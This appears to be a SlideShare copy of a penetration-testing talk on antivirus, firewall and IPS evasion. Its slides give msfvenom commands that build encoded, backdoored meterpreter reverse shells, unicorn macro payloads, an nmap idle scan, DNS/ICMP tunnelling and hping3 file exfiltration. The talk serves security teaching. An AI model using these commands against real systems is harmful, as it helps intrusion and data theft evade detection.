EvasionTechniques
3 likes•960 views
This document discusses various techniques for evading antivirus, firewalls, and intrusion prevention systems (IPS). It begins with techniques for antivirus evasion using tools like msfvenom, veil-evasion, shellter, and unicorn to obfuscate payloads. Next it discusses firewall and IPS evasion techniques like stage encoding/encryption, zombie scanning, tunneling over protocols like ICMP, DNS, and using a custom Tor configuration. The document provides examples and links to demonstrate these evasion techniques.
![Basic Tunnelling
Generic Routing Encapsulation
(GRE) is a tunneling protocol
developed by Cisco Systems
that can encapsulate a wide
variety of network layer
protocols inside virtual point-
to-point links over an Internet
Protocol network. [Wikipedia]
MAC
IP
GRE
IP
ICMP
DATA](https://image.slidesharecdn.com/a4f702bc-b25a-462c-90db-b4138e60712a-160824014247/85/EvasionTechniques-18-320.jpg)
EvasionTechniques
- 1. Antivirus, Firewall, and IPS Evasion Techniques CANDAN BOLUKBAS BY NORMSHIELD SECURITY
- 2. Candan BOLUKBAS • CTO of NormShield Security, Inc. • Computer Engineering BS • 5+ Network & Security Admin, 5+ Pentester • CCNA, CCNP, CEH, LPT, MCP, CHFI, ECIH, ECSP • [email protected] • @candanbolukbas • @NormShield
- 3. Agenda Anti-Virus Evasion Techniques ◦msfvenom ◦veil-evasion ◦shellter ◦unicorn ◦metload Firewall | IPS Evasion Techniques ◦Stage Encoding / Encryption ◦Zombie scan ◦Tunneling ◦Custom SOCKS proxy ◦Promiscuous transfer
- 4. msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -f exe -o rev_tcp_211_442.exe https://www.virustotal.com/en/file/df5433d6d23fe2dd87a75c9e402233f37ee3bd4f413fc60aabf0e6428dd48127/analysis/1471898471/
- 5. msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -x ZoomIt.exe -f exe -o rev_tcp_shikata_211_443.exe https://www.virustotal.com/en/file/9bc6fc56f936adce7d9bf5582b283a139dad82d4955bf4c8883c3619fb83cf73/analysis/147189938/
- 6. msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 - e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -f exe -x ZoomIt.exe -o rev_tcp_multiple_211_443.exe https://www.virustotal.com/en/file/d8b9f086aefb89d1e05bc0e86a254570430af6ae844e1336d7ce4d7aaceb73bd/analysis/1471899934
- 9. Shellter => auto & buitlin meterpreter payload https://www.virustotal.com/en/file/bdb1e245fb0ab720353bc249648769a1a54c681ba5727d15c2ef1072ec0993e0/analysis/1471903783/
- 10. Shellter => auto & custom multi encode meterpreter payload https://www.virustotal.com/en/file/80a7124e2fc6e496d03eef0ea6a3912a13dbe3240510be12b7394230e043e56f/analysis/1471904502/
- 11. ./unicorn.py windows/meterpreter/reverse_tcp 172.16.52.211 443 macro https://www.virustotal.com/en/file/5745d2856e4b1e47f8946f0c272b278fb25ef56d7a5bd43657fb0a41882fcdb2/analysis/1471905607/
- 12. ./autometload.py 2 172.16.52.211 443 https://www.virustotal.com/en/file/25dd87d068b879839f7625c50af4a3adbfc9defc21a6d7455539d0cb6c916749/analysis/1471905916/
- 14. Stage Encoding & Encryption https://github.com/DiabloHorn/undetected-meterpreter-stagers
- 15. nmap -sI 172.16.52.205:445 172.16.52.204 --top-ports
- 16. Basics L2 – Ethernet : ~28 byte (RFC 894) L3 – IP : 20 byte (RFC 791) L4 – TCP / UDP: ~20 – 60 byte (RFC 793 / 768) L7 – HTTP, SSH, DNS… Wireshark MAC IP TCP / UDP HTTP / FTP / DNS Layer #2 Layer #3 Layer #3 Layer #5-7
- 17. What is protocol tunnelling? Basicallytransporting a protocolinside another protocollike GRE (IP protocol 47) which transportsother IP protocolslike IPv4 (protocol 4), TCP (protocol6) etc. For instance:a DNS package looks like below: +------------------------------------------------------------+ | MAC | IP | UDP | DNS | Data :::::::::::::::::::::::::::::: | +------------------------------------------------------------+ If we use DNS as the transport protocol,we can place a TCP package in the following way : +------------------------------------------------------------+ | MAC | IP | UDP | DNS | | IP | TCP | HTTP | Data :::::::::| | +------------------------------------------------------------+
- 18. Basic Tunnelling Generic Routing Encapsulation (GRE) is a tunneling protocol developed by Cisco Systems that can encapsulate a wide variety of network layer protocols inside virtual point- to-point links over an Internet Protocol network. [Wikipedia] MAC IP GRE IP ICMP DATA
- 19. IP over ICMP IP over DNS DNS Tunnel capable malware Tunnelling demos ICMP172.16.52.203 172.16.52.216 HTTP Internet DNS172.16.52.216 Local DNS Server DNS InternetAuth. DNS Server HTTP DNS172.16.52.216 Local DNS Server DNS InternetAuth. DNS Server HTTP C&CHTTP
- 20. DNS Tunnel
- 21. DNS Tunnel capable malware
- 22. Custom Tor Configurations meek is a pluggable transport, an obfuscation layer for Tor designed to evade Internet censorship. Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network, Debian and security by isolation. Tor is a connection-oriented anonymizing communication service. SocksPort:443 defines which port is going to used for SOCKS Proxy HTTPSClient Custom Tor Tor Internet GWClient Whonix Tor Internet
- 23. promisctunnel.py & hping3 172.16.52.211 -p 11111 -d 100 -E file PromiscTunnel
- 24. Client sends a file to destination’s 10 different closed ports!